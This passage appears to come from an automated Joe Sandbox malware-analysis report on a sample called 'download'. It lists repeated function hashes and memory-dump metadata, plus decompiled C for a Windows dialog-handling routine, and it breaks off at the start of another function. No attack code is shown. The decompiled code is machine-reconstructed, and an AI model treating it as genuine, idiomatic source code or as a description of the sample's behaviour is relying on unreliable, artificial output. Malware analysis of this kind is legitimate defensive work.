                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf450196898546e7e529b3d0fc2cdb24068d8fdf218ff5ca9a54d879e3191130
                                                      • Instruction ID: 1aef0e0def1e0fae4b39087e076ca34ccd98dbaa108fd3b06cef3af9170ec361
                                                      • Opcode Fuzzy Hash: bf450196898546e7e529b3d0fc2cdb24068d8fdf218ff5ca9a54d879e3191130
                                                      • Instruction Fuzzy Hash: CC817873F2E301C9FB932470C5913F55770CF2A693E21CBA5B827A1565B62E7A4A36C0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32897 Relevance: .4, Instructions: 442COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a16defa801fb622fdcb0c03ecc5c906a3065f810be67c9525391e52fdaf2c99
                                                      • Instruction ID: b8157bc7851e7fc10f1f49713173ce8679e9a11b63278a974f693d1daeeee624
                                                      • Opcode Fuzzy Hash: 3a16defa801fb622fdcb0c03ecc5c906a3065f810be67c9525391e52fdaf2c99
                                                      • Instruction Fuzzy Hash: CF619A73F2E701C9FB932430C5813F656B0CF2A593E21CB917C27A1565B62F7A4D2684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32E97 Relevance: .4, Instructions: 439COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0b826653403a728cd60f9dd455d07dd73f14e390dd08aad994df30a99675b62
                                                      • Instruction ID: 4b4920b431e08806ea398f4d63e80888e5a2982e81e3750ec92b537efe5cebde
                                                      • Opcode Fuzzy Hash: c0b826653403a728cd60f9dd455d07dd73f14e390dd08aad994df30a99675b62
                                                      • Instruction Fuzzy Hash: 22517672F2E711C9FF932834C5813F656B0CF2A283E218BA17C27A1551B62F7A4D2784
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A31F75 Relevance: .4, Instructions: 438COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58e258613f29702198ceb1bd850673ca015607b339425c3a571a37a35e095080
                                                      • Instruction ID: 79e38e4ddcbea7e9fd0350ab66ce2d354e671401f61713b46768ce242165d492
                                                      • Opcode Fuzzy Hash: 58e258613f29702198ceb1bd850673ca015607b339425c3a571a37a35e095080
                                                      • Instruction Fuzzy Hash: 82918A73F2E305C9FB932470C5813F55770CF2B193E20CBA6B827A1565B62E7A493680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32F3F Relevance: .4, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c5748529c2b662c423728db257f7002686ae15a52c7f49c8017f655e856e8fd7
                                                      • Instruction ID: a5720614763e3b26abdac0edfcdcdf8e3ae98df27ea5f051f1446d19b0a4dd7f
                                                      • Opcode Fuzzy Hash: c5748529c2b662c423728db257f7002686ae15a52c7f49c8017f655e856e8fd7
                                                      • Instruction Fuzzy Hash: 82516672F2E715D9FB932830C5813F656B0CF2A293E218BA17C27A1511B72F7A4D2784
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32D30 Relevance: .4, Instructions: 431COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 034c4dd0d875d8564dc0c6a4a66667683f95c67b906027c6bcbe88bf7ad04f1e
                                                      • Instruction ID: c933f9251fe94d7b24f6b69b26621eaf59e5ccca37dcf0aa42ff126a80893748
                                                      • Opcode Fuzzy Hash: 034c4dd0d875d8564dc0c6a4a66667683f95c67b906027c6bcbe88bf7ad04f1e
                                                      • Instruction Fuzzy Hash: 9391162FA3D60489FA9A1F10D4413A31E60CB16DCFED04AFD7B13575EB762A7909168C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A324DB Relevance: .4, Instructions: 429COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4349df0ff0998a8beb21e9d4983eac8741e55490bcd46e2d6bdd5eca7e06ab16
                                                      • Instruction ID: 6f83e62da74a67d3cad38c24f39a48030dc6bf1d84bad3e524071edf16b0e960
                                                      • Opcode Fuzzy Hash: 4349df0ff0998a8beb21e9d4983eac8741e55490bcd46e2d6bdd5eca7e06ab16
                                                      • Instruction Fuzzy Hash: 41717A73F2E701C9EB932470C5413F55770CF2A683E21CB95B827A1565B62F7A4E3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A3296F Relevance: .4, Instructions: 417COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6266d79dfae733659d65a126d3c28282fcbc9e465920e59510b83ea3c6625b61
                                                      • Instruction ID: 9fad4d746e0d7a2fe3db2ab010a356266ec85c5ac9121ee0336bc56966247b58
                                                      • Opcode Fuzzy Hash: 6266d79dfae733659d65a126d3c28282fcbc9e465920e59510b83ea3c6625b61
                                                      • Instruction Fuzzy Hash: 75617673F2E701C9FB932470C5813F656B0CF2A593E21CBA1BC27A1565B62F7A4D2684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32DA2 Relevance: .4, Instructions: 411COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 055bf310327b89a34800a5b57d08fa5a5b729040a43cd862916f8c1d63387297
                                                      • Instruction ID: 30f946051c82fcf08274ac238d6462aae557abdee1ce2c7c832a1c58166d3cda
                                                      • Opcode Fuzzy Hash: 055bf310327b89a34800a5b57d08fa5a5b729040a43cd862916f8c1d63387297
                                                      • Instruction Fuzzy Hash: ED517872F2E311D9FB932470C5813F556B0CF2A693E218BA17C27A1515762F7A4D3784
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32260 Relevance: .4, Instructions: 409COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4894e5ef7c61b1176437927b3f043b78cca33a766735f1c8600dd943003edd94
                                                      • Instruction ID: ff40555dfc03944fed50a9f4a6ff9e8458a177cad5bf6771c580da6468a20656
                                                      • Opcode Fuzzy Hash: 4894e5ef7c61b1176437927b3f043b78cca33a766735f1c8600dd943003edd94
                                                      • Instruction Fuzzy Hash: 11817973F2E301C9FB932470C5813F55770CF2A593E21CB95B827A1565B62E7A4E3680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A3269B Relevance: .4, Instructions: 399COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8677db879c3cd17c84cd1c17d95d1e56b187b4aa360703c341dad2ff195ece6a
                                                      • Instruction ID: cd77a419069ed23cce2cf36f9887c763f1aa715f5362d16c0969935cb5d515e6
                                                      • Opcode Fuzzy Hash: 8677db879c3cd17c84cd1c17d95d1e56b187b4aa360703c341dad2ff195ece6a
                                                      • Instruction Fuzzy Hash: B9717773F2E701D9EB932470C5803F656B0CF2A593E21CBA5BC27A1565B62F7A4D2680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32552 Relevance: .4, Instructions: 390COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c2116ff96b20ef46a0748f35f080505feb7c0741651a24be0a98fe84182b63d
                                                      • Instruction ID: 0c834b4f607b44de67f446ecd1e59821d0dd7a1775bd3f2c87d630b6041eed2a
                                                      • Opcode Fuzzy Hash: 3c2116ff96b20ef46a0748f35f080505feb7c0741651a24be0a98fe84182b63d
                                                      • Instruction Fuzzy Hash: 47718A73F2E301C9FB932470C5813F656B0CF2A593E21CB95B827A1565B62F7A4E3680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32B94 Relevance: .4, Instructions: 389COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80bcb0269df4404a804d57f29762c8dccf0234b82166560e69d425865408184c
                                                      • Instruction ID: dd49e956106617f95a4ea7857a719e8675f7e98cc0c534002b076ad90b8db22b
                                                      • Opcode Fuzzy Hash: 80bcb0269df4404a804d57f29762c8dccf0234b82166560e69d425865408184c
                                                      • Instruction Fuzzy Hash: 4C517972F2E301C9FB936470C5813F657B0CF2A583E218BA67C27A1565762F7A4D2684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32B01 Relevance: .4, Instructions: 386COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51956fff592f4190d2684afd8b9a66404a4fec3012e79c87f41b1f8dd962fe5e
                                                      • Instruction ID: 7ff290e6dd3f7390ca4979cc2ced527b19c3d6b0dd2c35e05dac82fc0913c216
                                                      • Opcode Fuzzy Hash: 51956fff592f4190d2684afd8b9a66404a4fec3012e79c87f41b1f8dd962fe5e
                                                      • Instruction Fuzzy Hash: 57519A72F2E701D9FB932470C5813F657B0CF2A183E21CBA1BC27A1565B62F7A4D2684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32909 Relevance: .4, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20271abef5d48ff8262cd09fcdbaf51586995f6b4050cd8ae0931b77b7d416bc
                                                      • Instruction ID: f32c7a0f148918ad689e88d88872f17ecef5252f80c0b54b2b3864920b9ea050
                                                      • Opcode Fuzzy Hash: 20271abef5d48ff8262cd09fcdbaf51586995f6b4050cd8ae0931b77b7d416bc
                                                      • Instruction Fuzzy Hash: 3D618873F2E701C9FB932470C5813F656B0CF2A193E21CBA1BC27A1565B62F7A4D2684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A3318B Relevance: .4, Instructions: 361COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02297b02e36810aff7f7aba8ab06225459569d08ff178a7a1e201ae158997d4a
                                                      • Instruction ID: b715d352937dbe71880aedad736aa87759fca6b99f4c27e9bdd4af5ac0fddf04
                                                      • Opcode Fuzzy Hash: 02297b02e36810aff7f7aba8ab06225459569d08ff178a7a1e201ae158997d4a
                                                      • Instruction Fuzzy Hash: DD417972F2D711CAFB936830C1813F656B0CF2A193E218BA17C27A1151B72F7A4D2784
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32E1D Relevance: .4, Instructions: 360COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2421fac28460fa686d3b619b454b93a3c4e758ab7eb3ea10c5f5bc7c685c4e08
                                                      • Instruction ID: f0aec392757c3391e002f9b44a6b8361450d145bd7591e38a0d29b39a96457d5
                                                      • Opcode Fuzzy Hash: 2421fac28460fa686d3b619b454b93a3c4e758ab7eb3ea10c5f5bc7c685c4e08
                                                      • Instruction Fuzzy Hash: 2B518A72F2E711D9FB532970C5813F66670CF2A183E218B917C27A1515B62F7A4D2784
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32A20 Relevance: .4, Instructions: 358COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 497e562f579fe8686eaf036a037f47329719a2f23144c8c368cd7305e43aa01f
                                                      • Instruction ID: 02b98e0265ab07cf90338fd7322bc12778464f5e389f617feea277de13d544e6
                                                      • Opcode Fuzzy Hash: 497e562f579fe8686eaf036a037f47329719a2f23144c8c368cd7305e43aa01f
                                                      • Instruction Fuzzy Hash: C5618A73F2E301C9FB936570C5813F656B0CF2A583E208BA5BC27A1561B62F7A4D26C0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A32A08 Relevance: .3, Instructions: 330COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29d99094ac0fd2d5bbb10868c1b939012ca31597e3fe9aee5bacb898d1c64684
                                                      • Instruction ID: d6ea970ca3424192d393683aa1215c95e849deabbf793674e85e36ac37dcfe07
                                                      • Opcode Fuzzy Hash: 29d99094ac0fd2d5bbb10868c1b939012ca31597e3fe9aee5bacb898d1c64684
                                                      • Instruction Fuzzy Hash: CB517873F2E701C9FB932470C5813F656B0CF2A593E21CBA1BC27A1565B62F7A4D2684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404187 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E00404187(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x79e50c =  *0x79e50c + 1;
								__eflags =  *0x79e50c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404083(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x7a1ee0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E0040442B(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f48, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x79e50c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x79ed18; // 0xae4f0c
					_t25 = _t103 + 0x14; // 0xae4f20
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E0040403E(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404407();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x7a271c; // 0xaea04d
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_t71 =  *0x7a2f98; // 0xae8c88
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 + _t71;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E00404152;
					E0040401C(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E0040401C(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E0040403E( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00404051(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t85 =  *0x7a2f54; // 0xae4de0
					_t20 = _t85 + 0x68; // 0xfffffff1
					_t86 =  *_t20;
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x79e50c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x79e50c = 0;
					return 0;
				}
			}






















                                                      0x00404197
                                                      0x004042a9
                                                      0x004042bc
                                                      0x00404318
                                                      0x00404318
                                                      0x0040431c
                                                      0x004043e2
                                                      0x004043e9
                                                      0x004043eb
                                                      0x004043eb
                                                      0x004043eb
                                                      0x004043f1
                                                      0x004043f1
                                                      0x004043f4
                                                      0x00000000
                                                      0x004043fb
                                                      0x0040432a
                                                      0x0040432c
                                                      0x0040432f
                                                      0x00404336
                                                      0x00404338
                                                      0x0040433f
                                                      0x00404341
                                                      0x00404344
                                                      0x00404347
                                                      0x0040434c
                                                      0x00404352
                                                      0x00404355
                                                      0x0040435c
                                                      0x0040436a
                                                      0x00404382
                                                      0x00404384
                                                      0x0040438c
                                                      0x0040439b
                                                      0x0040439d
                                                      0x0040439d
                                                      0x0040435c
                                                      0x0040433f
                                                      0x004043a0
                                                      0x004043a7
                                                      0x00000000
                                                      0x004043a9
                                                      0x004043a9
                                                      0x004043b0
                                                      0x00000000
                                                      0x00000000
                                                      0x004043b2
                                                      0x004043b6
                                                      0x004043c7
                                                      0x004043c7
                                                      0x004043c9
                                                      0x004043cd
                                                      0x004043db
                                                      0x004043db
                                                      0x00000000
                                                      0x004043df
                                                      0x004043a7
                                                      0x004042c4
                                                      0x004042c7
                                                      0x00000000
                                                      0x00000000
                                                      0x004042cf
                                                      0x004042d5
                                                      0x00000000
                                                      0x00000000
                                                      0x004042db
                                                      0x004042e1
                                                      0x004042e1
                                                      0x004042e4
                                                      0x004042e7
                                                      0x00000000
                                                      0x00000000
                                                      0x0040430a
                                                      0x0040430a
                                                      0x0040430c
                                                      0x0040430e
                                                      0x00404313
                                                      0x00000000
                                                      0x0040419d
                                                      0x0040419d
                                                      0x004041a0
                                                      0x004041a5
                                                      0x004041a7
                                                      0x004041b6
                                                      0x004041b6
                                                      0x004041b8
                                                      0x004041bd
                                                      0x004041c0
                                                      0x004041c2
                                                      0x004041c7
                                                      0x004041d0
                                                      0x004041d6
                                                      0x004041e2
                                                      0x004041e5
                                                      0x004041ee
                                                      0x004041f3
                                                      0x004041f6
                                                      0x004041fb
                                                      0x00404212
                                                      0x00404219
                                                      0x0040422c
                                                      0x0040422f
                                                      0x00404244
                                                      0x00404246
                                                      0x0040424b
                                                      0x0040424b
                                                      0x00404250
                                                      0x00404255
                                                      0x00404255
                                                      0x00404264
                                                      0x00404273
                                                      0x00404285
                                                      0x0040428a
                                                      0x0040429a
                                                      0x0040429c
                                                      0x00000000
                                                      0x004042a2

                                                      APIs
                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404212
                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404226
                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404244
                                                      • GetSysColor.USER32(FFFFFFF1), ref: 00404255
                                                      • SendMessageA.USER32(00000000,00000443,00000000,FFFFFFF1), ref: 00404264
                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404273
                                                      • lstrlenA.KERNEL32(?), ref: 00404276
                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404285
                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040429A
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004042FC
                                                      • SendMessageA.USER32(00000000), ref: 004042FF
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040432A
                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040436A
                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00404379
                                                      • SetCursor.USER32(00000000), ref: 00404382
                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404398
                                                      • SetCursor.USER32(00000000), ref: 0040439B
                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043C7
                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                      • String ID: Call$N$RA@
                                                      • API String ID: 3103080414-2992999996
                                                      • Opcode ID: 937b42b3135c4e1aa36ae5a1725e39aac0471f252f69529ff53d1d3c1c1a1b80
                                                      • Instruction ID: 9d4f5b614004455fa0fc48963a53335b2d61895e96ab3f79d0888a2017683c32
                                                      • Opcode Fuzzy Hash: 937b42b3135c4e1aa36ae5a1725e39aac0471f252f69529ff53d1d3c1c1a1b80
                                                      • Instruction Fuzzy Hash: E761C5B1A40205BFEB109F61DD45F6A3B69FB84704F10802AFB05BA2D1C7BCA951CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
